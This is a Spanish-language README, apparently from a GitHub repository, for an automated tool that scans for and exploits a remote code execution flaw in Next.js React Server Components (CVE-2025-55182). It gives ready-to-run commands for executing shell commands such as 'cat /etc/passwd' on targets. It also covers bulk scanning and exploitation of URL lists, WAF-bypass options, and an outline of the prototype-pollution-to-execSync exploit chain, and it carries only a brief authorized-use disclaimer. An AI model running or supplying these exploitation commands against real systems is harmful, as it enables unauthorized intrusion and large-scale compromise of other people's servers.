
Una herramienta integral de investigación de seguridad para probar la vulnerabilidad de ejecución remota de código (RCE) en React Server Components de Next.js (CVE-2025-55182).
Este kit proporciona capacidades automatizadas de detección y explotación para CVE-2025-55182, una vulnerabilidad crítica de RCE que afecta a las aplicaciones Next.js que utilizan React Server Components. El kit consta de tres componentes integrados:
requestspip3 install requests
git clone https://github.com/yourusername/CVE-2025-55182-poc-tool.git
cd CVE-2025-55182-poc-tool
chmod +x exploit.sh auto_exploit.sh
La forma más rápida de escanear y explotar objetivos:
# Create a file with target URLs (one per line)
echo "https://example.com" > targets.txt
# Auto-scan and exploit in one command
./auto_exploit.sh -i targets.txt -s -c "id"
Identifica aplicaciones Next.js sin explotación:
python3 NextApp.py targets.txt
Archivos de salida:
confirmed_nextjs_targets.txt - Todas las aplicaciones Next.js detectadashigh_confidence_nextjs_targets.txt - Solo detecciones de alta confianzaPrueba objetivos individuales:
# Basic exploitation
./exploit.sh -d https://target.com -c "whoami"
# With WAF bypass
./exploit.sh -d target.com -c "cat /etc/passwd" -w
# Custom WAF bypass size
./exploit.sh -d target.com -c "ls -la" --waf-bypass --waf-size 256
# Skip SSL verification
./exploit.sh -d https://target.com -c "id" -k
./auto_exploit.sh -i targets.txt -s -c "whoami"
# Step 1: Detect Next.js applications
python3 NextApp.py targets.txt
# Step 2: Exploit confirmed targets
./auto_exploit.sh -c "id"
# Full auto-scan with WAF bypass
./auto_exploit.sh -i targets.txt -s -w --waf-size 256 -c "whoami"
# Custom delays and timeouts
./auto_exploit.sh -i targets.txt -s --delay 5 --timeout 30 -c "id"
# Skip SSL verification in bulk mode
./auto_exploit.sh -i targets.txt -s -k -c "hostname"
python3 NextApp.py <targets_file>
Argumentos:
targets_file - Archivo de texto que contiene las URL de los objetivos (una por línea)./exploit.sh [OPTIONS]
Opciones:
./auto_exploit.sh [OPTIONS]
Opciones:
Generado por NextApp.py - contiene todas las URL identificadas como aplicaciones Next.js.
Generado por NextApp.py - contiene solo detecciones Next.js de alta confianza (puntuación de confianza superior a 100).
Generado por auto_exploit.sh - informe de explotación completo que incluye:
El escáner utiliza múltiples técnicas de detección con un sistema de puntuación de confianza:
x-nextjs-*, x-vercel-*x-powered-by: Next.js__NEXT_DATA__ (100 puntos)_next/* (25-75 puntos según la cantidad)__NEXT_DATA__, __NEXT_LOADED_PAGES__middlewareManifest, self.__RSC_MANIFESTUmbrales de confianza:
El exploit aprovecha una cadena de contaminación de prototipos (prototype pollution) en React Server Components de Next.js:
__proto__ mediante deserialización JSON_response._prefixprocess.mainModule.require('child_process').execSync()X-Action-RedirectEl kit incluye capacidades integradas de bypass de WAF:
Actívalo con las banderas -w o --waf-bypass.
# Create target list
cat > targets.txt << EOF
https://app.example.com
https://dashboard.example.com
https://admin.example.com
EOF
# Run unified scan
./auto_exploit.sh -i targets.txt -s -c "whoami"
# Check results
cat exploit_results.txt
./exploit.sh -d https://target.com -c "cat /etc/passwd" -w --waf-size 256
# Step 1: Detect and filter
python3 NextApp.py targets.txt
# Step 2: Exploit high-confidence only
./auto_exploit.sh -i high_confidence_nextjs_targets.txt -c "id"
Esta herramienta está destinada únicamente a fines de investigación y pruebas de seguridad autorizadas. Los usuarios deben:
El acceso no autorizado a sistemas informáticos es ilegal. Los autores no asumen ninguna responsabilidad por el mal uso de esta herramienta.
Gracias a los investigadores de seguridad que descubrieron y divulgaron esta vulnerabilidad:
¡Las contribuciones son bienvenidas! Por favor:
Para problemas, preguntas o solicitudes de funciones, abre un issue en GitHub.
Este proyecto se proporciona con fines educativos y de pruebas de seguridad autorizadas. Úsalo de forma responsable y ética.
| Option | Description | Default |
|---|
-d, --domain | Dominio/URL objetivo | http://localhost:3000 |
-f, --file | Archivo con la lista de objetivos | - |
-c, --command | Comando a ejecutar | id |
-w, --waf-bypass | Habilitar bypass de WAF | Deshabilitado |
--waf-size SIZE | Tamaño de datos del bypass de WAF (KB) | 128 |
--timeout SECONDS | Tiempo de espera de la solicitud | 15 |
-k, --insecure | Omitir verificación SSL | Deshabilitado |
--user-agent AGENT | User-Agent personalizado | Mozilla/5.0... |
-h, --help | Mostrar mensaje de ayuda | - |
| Option | Description | Default |
|---|
-i, --input FILE | Archivo de entrada de objetivos | confirmed_nextjs_targets.txt |
-o, --output FILE | Archivo de salida de resultados | exploit_results.txt |
-c, --command CMD | Comando a ejecutar | id |
-w, --waf-bypass | Habilitar bypass de WAF | Deshabilitado |
--waf-size SIZE | Tamaño del bypass de WAF (KB) | 128 |
--timeout SECONDS | Tiempo de espera de la solicitud | 15 |
-k, --insecure | Omitir verificación SSL | Deshabilitado |
--delay SECONDS | Retardo entre solicitudes | 2 |
-s, --scan | Escanear automáticamente Next.js primero | Deshabilitado |
-h, --help | Mostrar mensaje de ayuda | - |